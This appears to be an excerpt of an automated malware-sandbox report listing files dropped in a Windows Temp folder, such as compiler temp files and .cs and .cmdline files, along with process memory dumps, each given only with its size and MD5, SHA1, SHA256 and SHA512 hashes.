7edb2bd050c320f7f664cc7123d2b0c2816d8fd1914cd3da2dc4d5107a2780ba02625ef2882cc39b059408800f54ac6633843b04cf352c61cbfb80001bbf1470

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC408A.tmp
Filesize
652B

MD5
06aeb6f373e37714361b8004102546b0

SHA1
bb7a5698eca0706ef4f1dabd9d089939a01add4c

SHA256
6229c8ed3de61250d9a242c5028aa3ab771dd01d80b15c7e2caa9b53217efa61

SHA512
9cc20344dc191d8bd1e37ab08f3bf444a789301d6c3c0776cd3a8eaa0372c398b29bac8e10e6392af8b2a772e9da828ec33a2f6ae753c6cacf500873b403e592

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC4117.tmp
Filesize
652B

MD5
652e83ec25b2597d7ced3b5a153e14d6

SHA1
1e225a06af6a22c67ff36810c997f65219e58c18

SHA256
4068df6e3057c728a474de34cbc8998e345b30fa6046a8a7d0234f20597e4f93

SHA512
c033cf6a7048b53dca5e241fecb7a4ce9d96538385af18d3908043c7daba053cc797728308a8719d3f35408568a99c903f1a15b35d6d8f04c4c30c41115dcd71

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC427D.tmp
Filesize
652B

MD5
0b60795cc47180a06f0a45841fe71357

SHA1
b962a2446fd6a99e5c09a1b7223602e0a2ced648

SHA256
ec49b270ad8c1a52a2dc7e8bcc46ab05c8650d8f56fd325b96367ffb600c3226

SHA512
a56518e3caa0ff53c39633417430d525ecc7191faa5e02c082c20239408fb0c3db26332822c51dd377d03ff5e1c3f392cad17d8e8a2f68dec8ccd240613fea91

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC4461.tmp
Filesize
652B

MD5
b3057af5770cb5b016d6fdf0869928bb

SHA1
0cb7f7523c2e97f4edaca024574b3844f013b38a

SHA256
e6d695bdc852294280e8e6f4a944f6f5d21c0e24c658aadc9344bace894e2f0f

SHA512
cdaeadd61eb113696583cd0f253f2506b746f92ba6cb147c2479f73567099c7cea11fc13573735d153cf201a38df01f77f762c632df648036ef7c18711d8b250

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hk2ic7k0.0.cs
Filesize
249B

MD5
69ecfeb3e9a8fb7890d114ec056ffd6d

SHA1
cba5334d2ffe24c60ef793a3f6a7f08067a913db

SHA256
0a913fd594ad2da3159400fc3d7d2cc50b34f8f31675ec5ac5a41d7e79e9fd58

SHA512
be7eb5a6a8bcc7f279aee00ad650aa872fc7fc08227eedeb9cc0a4273f0382b91306f60878728eaba3c79fa8c96066b144ecea897360a11be38996f04fdd99e1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hk2ic7k0.cmdline
Filesize
309B

MD5
59d2468e00a8ee5c5b3b506411b8b443

SHA1
071ff84fcc24b3fcc58cb818a922b8920430ef05

SHA256
e0e3c7d67026c69c72cb513a87076434fb2406f7e5a68788f8326efb6f543b98

SHA512
8abdaaecec6f9c9ec69f98dfb73c2a153c575212e7b723bbd43eacbe93bf05ab2b97a78488d198d5e60d7170e331da58a7cfaf020682410018565f899064b8e8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mknqsayr.0.cs
Filesize
286B

MD5
b23df8158ffd79f95b9bddd18738270b

SHA1
79e81bb74bc53671aeabecae224f0f9fe0e3ed7f

SHA256
856bded4416dd1595613354334ad1d3e5c4922a86102786429bcdb0e7f798882

SHA512
e23822d5b9a32d7fc705b772ef43bcb336e201ec9c1d2507a530e8b1b383b0727c0b53b92e881a953527e7b2ffb485e24c1161834c9380d1bb7498eac7e4a67f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mknqsayr.cmdline
Filesize
309B

MD5
93df3f45f42a441a734a5542d3f3b61a

SHA1
21a2fb3d1239d963eb96ec7d3ed8c1d32b73b570

SHA256
e8ee26ad909c0a41bda5fd08f2a0312aa35120b0d8780dac03989cbba4faeaf2

SHA512
c63089818a685e01fd736c6865bed08ca2bb025794b26a4a49be309492e9825bec7dba09a7441a4cb9ea619138cc1dd29bdffb85c7b8fea36010ac485524317a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\phvwbjk6.0.cs
Filesize
272B

MD5
4de985ae7f625fc7a2ff3ace5a46e3c6

SHA1
935986466ba0b620860f36bf08f08721827771cb

SHA256
53d5aecb149a00bc9c4fac5feb8e5feddf5c83986c12d5fef1c3ddd104b09004

SHA512
067916a8d16d322d72901baf3a369be43c99780961ccd306c171bf7ded06e3a13cf69c7fa0cd26c7fa181d87fc0e870f86d274098854a56346ca9272c0b99393

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\phvwbjk6.cmdline
Filesize
309B

MD5
949b0365c57ab6366857f2654ea659ad

SHA1
99fccac45e5f94777b499c8f16ddb45327a526de

SHA256
8de6c40237fa3d88ae8c45acbd13fe802fa35fdc21882cbfd0d9939ca94fe114

SHA512
ddbc13beddb7b2e59e71d532b310005bc8afb54a4cf4fd198f84bebd803a8df3956aa2a78590299eb68b8366422a3b1f68f9c1429009e0d727bed12988951355

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rzwh7zmy.0.cs
Filesize
259B

MD5
560e1b883a997afcfa3b73d8a5cddbc1

SHA1
2905f3f296ac3c7d6a020fb61f0819dbea2f1569

SHA256
e5231270257f1727ca127b669a7c21d46ced81cd5b46e89c48dd8304c1185bea

SHA512
041dd231b93708d4ad65580ea0fa7cff34a9a43ff8d3ae45b631a381e01dc286607aec05b1aade537818d068ca0b576cac613fde626d60eb2e4e6c3c0f525635

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rzwh7zmy.cmdline
Filesize
309B

MD5
e45a75d295db6042f36f327692ab7eff

SHA1
9ff38d2afab287381d67ebedd0d2de23c8bf78fd

SHA256
6ffd5feff4ef30bedc3d8edc14afa9a0b8cb1c79b54afbd7acbd44b1e44bafa8

SHA512
6ffffa5bf38200457df404be3c1fe1fd29e2bba9397d55611e4c7cc98f1844befb5126723fa63645662a09d963b007a0c9f7a18ff4d0f1e898aefe32a94dd1a6

Download Submit
memory/308-167-0x0000000000560000-0x00000000005A0000-memory.dmp

Filesize
256KB

Download
memory/1888-92-0x00000000020D0000-0x0000000002110000-memory.dmp

Filesize
256KB

Download
memory/1888-93-0x00000000020D0000-0x0000000002110000-memory.dmp

Filesize
256KB

Download
memory/1900-109-0x00000000025D0000-0x0000000002610000-memory.dmp

Filesize
256KB

Download
memory/1900-108-0x00000000025D0000-0x0000000002610000-memory.dmp

Filesize
256KB

Download
memory/1900-110-0x00000000025D0000-0x0000000002610000-memory.dmp

Filesize
256KB

Download
memory/1900-233-0x00000000025D0000-0x0000000002610000-memory.dmp

Filesize
256KB

Download
memory/1900-234-0x00000000025D0000-0x0000000002610000-memory.dmp

Filesize
256KB

Download